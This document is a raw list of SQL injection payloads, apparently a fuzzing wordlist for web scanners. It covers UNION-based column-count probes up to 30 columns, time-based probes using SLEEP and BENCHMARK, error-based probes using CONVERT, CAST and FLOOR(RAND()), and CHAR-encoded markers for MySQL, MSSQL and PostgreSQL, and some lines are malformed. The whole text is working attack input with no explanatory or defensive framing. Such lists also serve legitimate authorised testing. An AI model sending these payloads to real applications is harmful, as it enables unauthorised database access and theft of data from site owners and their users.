UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
UNION ALL SELECT 1--
UNION ALL SELECT 1,2--
UNION ALL SELECT 1,2,3--
UNION ALL SELECT 1,2,3,4--
UNION ALL SELECT 1,2,3,4,5--
UNION ALL SELECT 1,2,3,4,5,6--
UNION ALL SELECT 1,2,3,4,5,6,7--
UNION ALL SELECT 1,2,3,4,5,6,7,8--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
UNION SELECT @@VERSION,SLEEP(5),3
UNION SELECT @@VERSION,SLEEP(5),USER(),4
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNION SELECT @@VERSION,SLEEP(5),"'3
UNION SELECT @@VERSION,SLEEP(5),"'3'"#
UNION SELECT @@VERSION,SLEEP(5),USER(),4#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
UNION ALL SELECT USER()--
UNION ALL SELECT SLEEP(5)--
UNION ALL SELECT USER(),SLEEP(5)--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5)--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT NULL--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))--
UNION ALL SELECT NULL#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#
UNION ALL SELECT NULL
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC)
AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL--
UNION ALL SELECT 'INJ'||'ECT'||'XXX'
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8
